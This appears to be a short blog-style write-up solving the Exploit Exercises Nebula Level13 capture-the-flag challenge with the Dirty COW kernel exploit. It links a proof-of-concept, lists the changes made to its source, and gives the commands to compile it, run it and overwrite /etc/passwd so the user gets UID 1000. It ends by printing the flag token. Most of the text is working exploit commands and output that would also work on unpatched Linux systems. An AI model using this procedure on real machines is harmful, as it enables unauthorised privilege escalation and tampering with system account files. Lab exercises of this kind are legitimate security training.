Solving Exploit Exercises Nebula Level13 using DirtyCow

November 08, 2017

When you got nothing better to do

[email protected]:~$ /home/flag13/flag13 
Security failure detected. UID 1014 started us, we expect 1000
The system administrators will be notified of this violation

Use this PoC - https://gist.github.com/chriscz/f1aca56cf15cfb7793db0141c15718cd

Modify line 22, 23, 136 as follow:

[email protected]:~$ grep -E "define REPEAT|size <= mmapsize"  mucow.c 
#define REPEAT 10000 /* 100 */ 
#define REPEAT_WORD 10000 /* 100 */ 
//assert(size <= mmapsize);

Compile

[email protected]:~$ gcc -pthread mucow.c -o mucow

Copy and edit /etc/passwd

[email protected]:~$ cp /etc/passwd passwd_new
[email protected]:~$ grep level13 passwd_new
level13:x:1014:1014::/home/level13:/bin/sh
[email protected]:~$ vi passwd_new 
[email protected]:~$ grep level13 passwd_new
level13:x:1000:1014::/home/level13:/bin/sh

Run the exploit

[email protected]:~$ ./mucow /etc/passwd < passwd_new 

Watch /etc/passwd. Once UID for level13 has change, you can stop.

Logout and login again as user level13

ssh [email protected]
[email protected]'s password: 
[email protected]:~$ whoami
nebula
[email protected]:~$ /home/flag13/flag13
your token is b705702b-76a8-42b0-8844-3adabbe5ac58

Yay!